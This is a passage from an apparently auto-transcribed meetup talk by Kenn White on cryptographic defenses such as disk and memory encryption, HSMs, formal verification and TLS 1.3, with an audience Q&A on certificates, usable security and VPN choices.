a half, two years ago. He, his phone cert’s going
nuts with messages because his Instapaper service is just down. It’s kind of a bookmarking site but it’s really cool and
well-designed and all this stuff. Turned out Marco was fine, he
wasn’t doing anything wrong, but somebody who was
doing not nice things, at Marco’s web hosting company, on the same rack, got a visit by the Feds and so they took the whole
rack, including Marco’s. That’s probably the more
common kind of thing, right. But, on the other hand,
there are things like, government and civil capture. He discovered these kind of things. If there are data that are mirrored, you probably want to have
full transparency into that. You probably don’t wanna, have that happen without your knowledge right. So there are lots of, in a shared infrastructure environment, Amazon, Google, so forth,
they’re probably not quite as applicable as more like
the regional data centers. But this stuff happens all the time. The other thing that we do worry about is what about the Cloud apocalypse right. What if we break out of Zen or KVM, or whatever the virtualization piece is, and whoever happens to be on your node, can now see your stuff, right. To their credit, Google
with Zen and, I’m sorry, Amazon with Zen and Google
with their Compute Engine, they’ve got heavily
customized version of Zen and KBM respectively, but a lot of people don’t. A lot of mid-level and sort
of other players don’t. They’re just running like stock Zen. And so, you know, we
do have breaks because weird things happen like,
strange sound blaster emulators and other kind of weird, you know, QMU, device-drivers get exploited
and so you have these, you know, escalations where basically one of the other people that are sharing your Cloud
Instance, could break out. Multi-tenant media reuse. The other thing too is, I
covered a story in Wired about two years ago. I was on, let’s call it a top
five Cloud provider’s server, and I don’t even remember
why I did this exactly, but I was mucking around with dm-crypt and I meant to do the Unix cat command on this encrypted volume,
to test something. But I ended up doing it on
basically the raw volume that you get. And I was getting people’s
passwords and user names and weird like, My Little
Pony kind of stuff and, (laughing) I’m like what, what is this. The Cloud provider wasn’t
initializing the hard drives between customers right. So you’d spin up an instance,
you’d run your web server, you’d do whatever you’re gonna do, and then you’d turn it off right, that’s the use case for most Clouds right. They didn’t initialize the drive and so whatever was written by
whoever happened to be on that hard drive on that Cloud provider, I literally was seeing like,
you know, the goods so, that’s another great reason
why you might wanna do full volume encryption. In the case of Amazon and Google, they’ve made attestations
to the Defense Department, to the Federal Government,
from their senior executives, under risk of going to prison
if they’re misrepresenting, about their controls around
how they rip disks out and how they destroy them and so forth. So I think you’re probably okay but, every other provider and most, and anything that you’re doing in-house, in terms of your own hosting,
disks get repurpose, servers, maybe you don’t care about getting stolen, but disks die, they end up in a box, maybe they end up in another box, maybe they end up in another
room and at some point, maybe they get trashed
or maybe they end up on Craigslist or Ebay and if that’s, if you don’t have full volume
encryption, that’s a problem. Content repudiation, I don’t,
I don’t think that’s quite as relevant but the idea there
is that there is information on a machine that you want
to be able to point to specifically and say,
that is my data it’s not, and so encryption can help in that sense. Data rest compliance, that’s just a given. If you’ve got the standard practice for HIPAA protected data for example are, you encrypt your disks at rest. Adversarial admin
incompetence, live VM motion. VM motion’s interesting. So do people know about
this, live VM motion? VWware created the original,
I believe created the original sort of version of this. The idea is that you’re
running a live machine, you’ve got dozens, hundreds of processes. You’re listening on network ports. You’re running a database. In real-time this technology
captures the state of the CPU, the state of memory, the
state of the hard drive, and the state of all processes, moves it to another machine
live, with like binary deltas, and you don’t, you know, you don’t lose, you don’t have to reboot. There’s like black magic voodoo in there that I don’t really understand, but one of the things
that occurs to me is, well, hmm, what if we’re,
so when we move those data, data from the disks are coming over too, we trust ourselves, we
trust point A, point B, do we trust the person in between? And I don’t mean trust in like a, there’s a black van I’m
paranoid about outside, I mean trust as in like
to do the right thing. But not just on disk, so
if you think about it, now Google has a similar, I’m
not sure how it’s branded. But a similar like no
downtime kind of feature for some of their Cloud instances. But that means that they’re taking memory and running processes and
managing it on your behalf, and moving it. So if you’ve got, for
example, sensitive data, confidential information, keys, whatever, you’re trusting them. There’s a whole host of
reasons you probably, you know, like, you’ve
already trusted so much and sort of delegated so much already, but that is, that is another use case. Memory encryption. Cold boot attacks, so
I don’t know if folks are familiar with this, you
don’t see this quite as much but the idea is that when memory fades, it takes between seconds and minutes and if you’re, like a
really determined adversary you can physically take
memory out of a machine and bring it back up. It’s more kind of kind of like, you know, James Bond-ish and stuff. What’s, what’s, I mean, you know really, if Langley or like Fort
Meade is your adversary this is the last thing
you need to worry about. Multi-tenant reuse so, on a big host virtual
machine, memory’s chopped up. What if there’s a break? What if there’s a, you know,
a puncture through that? What if another person
sitting on an instance can get host and then back into your, into your live memory. That actually has happened a few times. As I mentioned the live memory snapshots. There’s not a whole lot
that’s, I can talk about, that’s happening. There’s a company called Private Corp, Facebook acquired about a year
and a half ago, two years. Incredible technology, and
I hope they open source it. But they were literally
doing like layer two cash, on chip, on CPU encryption. In other words, the memory
that’s used for layer two cash, was actually being used
to encrypt and decrypt on the fly so that raw memory
was encrypted natively. Very cool technology. But I haven’t seen a
whole lot of other sort of similar solutions to that. Data in use encryption. This is transparent data encryption. Property preserving encryption. There’s some interesting developments but, I think it was the December
Real World Crypto at Stanford, or maybe it was New York, but anyway, they’re academically promising
things that are happening but in terms of the actual
commercial product space for Property Preserving Encryptions, the idea is that you could
have social security numbers, credit card numbers, things
like this, you could sort them, even though they’re encrypted. Even though you’re blind to what they are, you can still do those operations on it. There, we’re still struggling
to get a performant decent solution for that. It’s to the point that
there at least a couple of commercial solutions where
it’s a glorified XOR, it’s a glorified Caesar cipher
to break that stuff right. So there’s some interesting
things happening academically but I’m not seeing a whole lot that’s super-trustworthy out. Blackbox custodian is another use of this. I see this in some defense installations and some financial
institutions where for example you have a big Oracle implementation. You’ve got a system
DBA, an application DBA, a privilege DBA and
different like table spaces are encrypted both on disk and in memory, in such a way that the theory goes, all but the master keyholder are blind to other people’s information. It’s all about delegating
trust ’cause at some point there’s gonna be a keymaster, and if that person’s untrustworthy
they can do bad things. The last piece on
hardware security modules. I do wanna leave a few
minutes for question so we’ll wrap it pretty quickly here. Just, if you haven’t been
following this too closely, I don’t mean the hardware
security modules that cost like thousands, or hundreds
of thousands of dollars, that are like NIST certified, I mean hardware security
modules in the sense of, you get them by the hundreds
or thousands on a tape reel, they’re a dollar, $2 now
in volume for, you know, a pretty capable hardware security module. Financial institutions,
lot of regulated spaces use the sort of NIST blessed,
you know, the FIPS compliant hardware security modules. They do it for some of
these reasons right. It’s delegating and
making it very difficult so the thinking goes, to steal keys, tab seats for token
generation and so forth. Do you guys have, I don’t
know if I can even ask that, but are you looking, or do you have, I mean is there, are there
HSM’s here or do you have proprietary, right right. Yeah we should probably talk
later ’cause there’s some. (laughing) There’s some, there’s
some just staggeringly bad implementations of HSM’s
on the commercial market. And you’d think for like
a hundred thousand dollars you’d get better than,
your old version of Debian that’s unpatched and,
you know, can be routed. But that’s another conversation. So this is how, you know,
these are some sort of top-level things, ways
I’ve been thinking about some of the crypto defenses. There’s a map at the end,
this kind of maps it out into those top-level areas. There’s some more specifics
in here and it links the end. I don’t know if you guys
know this guy, excuse me, Ange Albertini. He was one of the people
on the SHA Collision Team. He’s also like a
brilliant graphics artist. Crazy, like really good,
security researcher and applied crypto guy and like great artist. He was playing around
with this, this diagram, and he came up with like the,
you know, the cyber version, I thought it was kinda cool. I was thinking for, you
know, the display purposes. But Ange wasn’t thinking that way. Ange was thinking well, you know, we can do a polyglot
that’s both a GIF and HTML. Or pdf and JavaScript. Excuse me. Script source=polyglot
blah blah blah .gif. Image source=polyglot.gif, what. You can use a gif as a basis
for JavaScript execution? Yes, yes you can. (laughing) So if you download my diagram
you can either run it as, in your browser with an HTML extension, it’ll say hello world. Or you can just view it but, that’s crazy stuff. This was before the SHA-1 collision, that’s the same file by the
way, that’s what the trick is. I’ll just go through these super quick. So there are a couple of
things to be aware of. I love this, formal software verification. The DARPA drone project, I don’t know if people are
aware of this broadly but, so this, this took place
like two or three years ago. It got a tiny bit of
splash but not a whole lot. DARPA does all these kind of
interesting innovational awards that, you know, the Defense
Department’s R&D group. They had this question which was, could you make one of these
little quadcopter drones. Could you do a fully,
formally verified drone? And so got together people
that are in formal methods, and verification, and in mobile security, and guidance systems. And in the span of like 18 months, yeah, they built an entire from the ground up, fully verified little drone that has fully verified navigation,
geolocation, instrumentation, communications, from
the ground up rewritten. The headlines were hacker-proof drone. That’s not exactly true. But the, but by dramatically
reducing the surface area and compartmentalizing the
security guarantees of this thing this is like, this is a major
thing and people were like, oh that’s kinda cool, and this went on. No no no this may be like a
fundamentally different way of thinking about what’s
possible in kind of the consumer space, and
automotive space for example. So I don’t know if people
are broadly aware of this but the top four Cloud players are rewriting their network stack. Right so, Google two years
ago, after Heartbleed, they did a fork of that
and it’s called BoringSSL. Amazon’s s2n, I think
it’s signal to noise, iOS’s CoreCrypto and Microsoft’s Schannel. They’re all getting refactored
and have been undergoing this process for like, you
know, a couple of years now. But they’re actually going
through a formal verification and proofs of construction
for their security properties, at the protocol layer. I mean that’s really
interesting and exciting. The CyberUL Project from Mudge. I’ve got some other links,
as I say, at the bottom. It’s definitely worth checking out. The idea is that this
would be sort of like a, what a consumer report, like an underwriter lab’s
kind of thing, but with, you know, in the consumer security space. So if you have a bay monitor,
it’s not saying this is like hack proof, but there’s a
minimum baseline level of, you know, maybe you shouldn’t
be using like, you know, Apache 1 and you know, Telnet, with default passwords and things. So there’s a whole, the idea
is to really bump up kind of the base line for consumer product space. I don’t have time for these
but I’ll leave some links at the end. These are some other cool things, if you’re into sort of applied crypto and where we might be
able to use some of these solutions I mentioned. But really it comes down
to first principles right. Security hygiene, trusted supply chain, the root of trust. I saw this by John Lambert from Microsoft. There are simple, I know
this isn’t a Window shop but, there are simple policy
mitigations that can be done, to block an enormous amount
of corporate threats. People doing things as simple as kind of a esoteric applications that we don’t see in the wild as much. Like mapping those to
Notepad and other things that are not an executable. Sort of interesting. If there are 4300 different trusts on your certificate
store in your browsers, that’s, there are people that
have been thinking about, are there ways that we
can really reduce this. Maybe I have no business
with the Polish government. Maybe, or maybe I’m in Poland
and I have no business with, you know, the Chinese Defense Department, and so some of their
certificates and things are not relevant to me,
sort of reducing that. But I also think that we’re
seeing some interesting, really practical
approaches to this as well. If this then that. I mean why not do simple things like this. If most of the consumer
apps that have tie-ins, like authorized apps
did something like this, I think we’d see a whole
lot less hacks right. If instead of, oh yeah
I tied my Tumblr account five years ago, to Twitter,
and it’s still there, and it’s active. So sometimes it’s thinking simple, not, you know, not complex. And just remember this picture. And I’ll leave it here too. This is something I really wanna emphasize to everyone I talk to. I go to these crypto meeting
two or three times a year. Some of the best in the world, but they, but sometimes people who
have such incredible depth, you hit a point and it’s just
a cliff of like, I don’t know. This, your black box
is what I do every day, but I don’t know. So, like, I’m not a protocol guy. Oh yeah I’m a, you know, I’m a, you know property preserving
encryption expert. I’m a formal methods person. I have no idea about like
real world, you know, web server vulnerabilities and things. There is a collection of knowledge that, it’s the, it’s encompassing all that, to sort of bring these things together. If it feels like when you’re
working one of these areas, that you’re really out of your element, I just like the way this is described, because these are
difficult and complicated and deep, you know, deep issues. Right. This is a quote by Matt
Blaze I thought was great. If nothing else, this is when the California Apple case was happening. A basic security principle. Design your system so that
even you can’t attack them. Now if you guys saw Apollo
13, I love this line. I don’t care what anything
was designed to do, I care about what it can do. That should be your
mantra in thinking about security defenses. Don’t care what anything
was designed to do, care about what it can do. And always be flexible. We’re done. (audience applauding) – Great thank you Kenn. Any questions from the audience? Josh. The catchbox might not work hang on. – [Kenn] By the way
that was 174 slides so, not bad, in just over an hour. – [Mike] All right question
from the YouTube live stream. This is actually from our CTO Jon. He’s asking, how terribly
you think we’re gonna botch, TLS 1.3, 1.30 round trip. – [Kenn] You know, it’s
a little out of my lane. What I can say is that we’re
gonna botch TLS 1.3 in general in a whole lot of different ways. (laughing) So one of the best examples is, Google, whatever else you think
about them they have some really, really
brilliant network engineers, that have been thinking about
a lot of difficult problems with compatibility and
backwards compatibility and things for a long time. I don’t know if you saw the
story of maybe six weeks ago. A major school system in Maryland, it’s called Montgomery
County, they’re huge, had hundreds of thousands
of Android Chromebooks that just died one day. Like what? So Google had turned on TLS 1.3, not because normal mortals use it, ’cause it’s not really even
enabled in modern browsers, but sort of probing, because monster things
like Akamai and Cloudflare, you know these huge global
content distribution systems, have slowly been rolling
out TLS 1.3 for a while. Well it turns out it
wasn’t the Chromebooks who were barfing on TLS 1.3, it was their man in the middle network box that they had installed
at all these schools, that went to do the negotiation and it, it really is this simple. Hello, I speak TLS 1.0,
1.2, 1.3, or whatever, 1.2, what do you speak? I speak TLS 1.3. And so these admins came in and like hundreds of thousands of kids’
and teachers’ Chromebooks were just like spinning like, you know, rebooting themselves, so
Google had to like turn it off. Anyway, these are not cheap devices. These are multi hundred thousand dollar, you get a consultant team,
army for like two years, to kind of eke out something
that sort of works. So yeah we’re gonna be seeing
a lot of pain through that. But I don’t think it’s unique to TLS 1.3. They’ve gone through a lot of work to get the backwards compatibility right. Corporate America loves their
man in the middle boxes and you know, we’ll see. But no I, in terms of the Zero RTT, I think that’s gonna be an
instance of this sort of thing where things are gonna die
inelegantly but, you know, people will patch and move on. – [Mike] Other, other questions. Yes. – [Man] Does this actually work, oh. – Hey it does. – [Man] Um so it was interesting I mean, I love all the technical stuff and all the man in the middle challenges
and all those other things but of course many of
the security problems that we have seen are human, right. Like John Podesta, oh by
the way here’s my password. Things like that. So who is doing research
on user experience and how that folds into security because easier installation
of certificates with verification would be one thing, also making sure that you
can verify that whoever is asking you for your password
is a legitimate actor, things like that. – Work is going on, I
can’t say specifically who’s doing that, it’s
kinda, it’s outside my lane, I don’t know if you wanna chime in. – [Mike] Yeah I mean I
would check out like SOUPS which is the Symposium on
Usable Privacy and Security. Lot of great work coming
out of Carnegie Mellon and a lot of other institutions. Chrome Security Team,
especially like on their work on Enamel, which is secure design. – [Kenn] Oh yeah right. – [Mike] Great stuff to check out yeah. – [Kenn] I know there’s a group at IU, at Indiana University,
that’s thinking about this. But even, you know, it
gets a lot of press. I don’t know how widespread Signal is like in actual deployment versus WhatsApp and all these other things. But even Signal is like
actively hiring designers because things like, you
start an encrypted voice call, and there’s two or three words, and you say those words
to the other person, that’s brilliant. Why do we go like, through
all the machinations of PGP, awfulness, before somebody said you know, there’s this actual usability
thing we should think about. – [Mike] But then you
wouldn’t get the annual why Johnny can’t encrypt rehash. – [Kenn] That’s right, that’s right. – [Mike] Other questions? Yeah. – [Man] Ah so one of the
questions that I had about TLS 1.3 I don’t know if you had
seen the developments coming from Matthew Green
on behalf of US Bank, where they were talking
about basically they need to be able to sort
of by-pass the PVS stuff. They want to be able to,
you know, have an option to have static
Diffie-Hellman keys in there. So this isn’t something that
is designed to, you know, sort of improve the end-user’s security, this is hey, I need to
by-pass this security feature. So I guess my question is, you know, in terms of the trade-offs
that they’re making on that, what are your thoughts
on that proposed change to the TLS 1.3? – [Kenn] I’ve seen massive
outcry and backlash to that. But I wouldn’t for a second
claim to have any insights into the psyche of the ITF world. It’s just, it’s like you go
in it and then you’re just never seen again, except on email lists that go on forever. I actually don’t, I’m not too concerned some of those truly last
minute 11th hour requests, are actually gonna get ratified. I just, you know, having, having interception by design, it just seems, you know,
it’s just backwards. That said, you know, there, you know, if major financial
institutions have, you know, people on these committees
that have been working earnest for years, they have a voice. So I’m not too concerned about it but nothing would surprise me. Which by the way and
that’s one of the reasons that you have five different
kinds of VPNs right. You got, IKE 1, two, you got LTTP, you know, encapsulation. Then you’ve got Cisco’s version. Hopefully we won’t see something
like that with TLS 1.3. – [Man] You touched on the
certificate authorities and how we inherently trust them, whether or not they deserve that trust. Are there other ways that
are likely to catch on to, you know, provide that trust for browsers and other applications, than this model where someone blesses
the certificate authority from a central location. – [Kenn] Sure, you know. When I first started I
used to think that the self sign certificates
were like this lazy hack. And the longer I thought about it, I finally realized no
that’s actually in some ways the most secure. If I actually control the endpoints. If I’m able to, with full
spread on all mobile devices and all desktops, put my keys on, that’s sort of the best
situation right, because, and it’s not just browsers right, so don’t get browser centric. On any given Linux box there’s five, 10, 30 certificate stores. Every app may come with
one which may or may not have got an update in the last two years, which may or may not be Heartbleed still vulnerable, help us. I mean we see that all the time. But Wendy and I were
talking just earlier that there is this notion of, you know, the certificate authorities
are voting to drop it down to 30 days, 60 days, I mean
these are serious discussions. So this notion of like
truly long-term three year trusted on high, I think people
are sort of thinking about there are different ways to do that. – [Mike] Other questions? Okay. All right one more from YouTube. What’s the most promising, interesting, or important new crypto defense you see coming down the pike
in the next few years? Differential crypto or
privacy rather, PIR, which I believe is private
informational retrieval, or something else. – [Kenn] Some of the
differential privacy stuff is really interesting so, I don’t know if people follow
this so much but there’s Apple among others is
shipping really powerful neural net code on devices, because, you know, modern mobile devices are actually getting,
you know, pretty speedy. They’ve got an entire R&D
group thinking about ways to do this where you can, for example, do public health type surveillance, but preserving, you know, preserving the protections of identity. I say promising because
it’s actually shipping and there’s some interesting
health applications coming out of it. There may be dozens of other things just not on my radar but that’s something to definitely keep on the lookout for. – [Mike] Yeah. – [Man] Hey I was curious
in terms of like the Google beyond corp stuff that’s, I’m not sure if you’ve
got to see or, okay. Just was wondering if
you’d seen it or had any comments on it. – [Woman] We’re all about that here. – [Kenn] Okay. – [Man] It’s also why I thought
it would be maybe a good. (laughing) – [Woman] So a lot of this
deep into how these works, how they’re flawed and how
we’re trying to do better is fascinating and all but
for a lot of people in DevOps and, the security analysis design, information assurances,
and in response type stuff, a lot of that is inaccessible. We have what we have and
we’re doing what we’re doing. Do you have any thoughts or wisdom that you could
share regarding, you know, communities that we can touch base with. Security benchmarks for the
applications that we have and things like that, in
order to reduce the likelihood that threat actors could
potentially take advantage of vulnerabilities in the configurations of our systems. – [Kenn] Right, that’s a great question. So the question was around, sort of, getting acclimated to, deeper areas of security awareness, what communities, what resources, I think that’s sort of
where you’re going and, and then actually what
are actionable things you can do to sort of make progress there. One thing that people are doing, I think it’s been happening
for a long time but but they’re talking more about it, are these tabletop scenarios, right. There are actually Twitter bots
now with tabletop scenarios. So one of the tabletop scenarios is, your DNS got owned. Let’s pick Go Daddy
because, you know, Go Daddy. And somebody, for some period of time, put up a phishing page,
but with your domain name, and with your certs, and your
employees, or your customers were entering their credentials,
and you just discovered it. What do you do? Wow. So I mean, so these, I mean
that’s just one example, but the sort of scenarios to
go through to really push hard about okay, well what does
our instant response look like and what does our risk
profile really look like and what is our, you
know, PR strategy here and do we, have we
really thought, you know, yeah we know network
segmentation’s important but we didn’t really do it. I mean, a lot of these, the benefits of those kinds of scenarios, are A, it’s multi-disciplinary, you have a lot of different
people with different hats on the table, thinking about problems, when you have time to breathe and think. One of the most valuable things I ever did when I was more into
the architecture space. I was on a project just out of school, and
the managing VP was like, none of you 12 people know
anything about Oracle, and it really ticks me off
’cause we’re billing out huge rates that say that you’re, you know what you’re doing with Oracle, so we’re gonna send you
to Oracle Headquarters for like six weeks of boot camp. Okay. But one of the things that
Oracle brilliantly does when they train their DBA’s in-house is, you drill again and again and again. You do these labs where
data files are corrupted where back-ups are corrupted,
where archive redo logs are corrupted, and you sit at
the keyboard, and you fix it. And you do it again and again and again until it’s just automatic. Now we can’t predict you know, all the different scenarios, but you can get a lot
of insights and a lot of interesting ideas from
these tabletop scenarios. So I think that’s one place to start. There’s countless
possibilities for, you know, kind of community things. I would probably not recommend
the def con and blackhats of the world, I would recommend. No I mean in terms of operational stuff. There are lots of
interesting things around security automation, security
DevOps kind of things that are, that are sort of less, you know, they get less attention, but
it’s what real-world defenders are doing right now like
what’s actually working. How are people using Vault, for example, to do tokenization. What are people using
with Google Compute Engine and ASS with their key management systems, and Cloud key management. And what works, what’s
painful, what’s not. And then how do they implement those. I mean there are, you know, so there’s different
creative ways to do that. But I think, thinking through some of the worst possible things
is a great way to kind of, you know, get these conversations going. – [Mike] Any other questions for Kenn? Any other questions for Kenn? Yeah. Are there any VPNs you like Kenn? – Yeah so I’m actually
giving an entire talk at the International
Crypto Module Conference in May in D.C. but the preview of that is, it’s a very short piece
of advice which is, you probably, if you’re in this room, you’re probably capable
of running your own. And if you’re gonna run your own, don’t look at blogs, don’t
look at, you know, these, your cousin’s advice and stuff, look at some of the best
people in the world, who do mobile security for a living, at a really, you know, a depth. And those people are from the Signal team, and they’re from the Trail bits
team and this sort of thing. So Streisand and Algo VPN, two of the strongest curated, well-maintained, mature,
sane security defaults. You can set up an Algo or a Streisand in an hour or two, you
know, it’s easy to do. If you’re asking me what
do you tell your cousin that bugs you at holiday
dinners, you know, there are a couple of decent
companies that seem to have decent anti-features right. What they don’t promise and what they are very particular about saying, these are the pieces
of information we keep. And yes if we’re served with a court order of course we’re gonna do that. If a company brags about
Bitcoin and anonymity and not logging, I don’t believe them, and I don’t think you should use them. So Cloak and TunnelBear
are two services that have engaged outside credible
third-party firms. I’ve seen the audits from
one of those organizations and they’ve done a lot of
work to improve their posture, but more importantly
the fact that they even asked for that help, puts
them in the 99.99% tile in the industry. If you follow me on Twitter
occasionally I’ll post updates and things but yeah, I’d say, the vast majority of consumer VPN services are either actively malicious
or incompetent or both (laughing) and even if they have
elements of a text stack that are okay, they’re offering
terribly insecure defaults for a good part of their customer base and they just don’t care. And search engine optimization
gaming, these are, you know, these are seven,
eight figure ad buys. Best VPN. Recommended VPN. Those are seven, eight
figure ad buys on AdSense so I mean if you start with
Google and get, you know, PC Magazine and sort of editorial reviews, they just don’t have
the capability to make any kind of security assessment. They’re gonna go on features, and price, and this one’s at 12.95,
but this one’s 6.95, so that’s their number
two editor’s choice award. Like wow, okay. – [Mike] Cool any last questions? All right so I just wanna thank everybody for attending tonight. I wanna thank Kenn for
coming up to Ann Arbor, so let’s give Kenn a round of applause. (applauding) Thank you all again for coming and just be on the lookout for the
next Tech Talk announcement on the meet-up site. Thank you. – [Kenn] Thanks.

One thought on “Crypto Defenses for Real-World System Threats – Kenn White – Ann Arbor”

Leave a Reply

Your email address will not be published. Required fields are marked *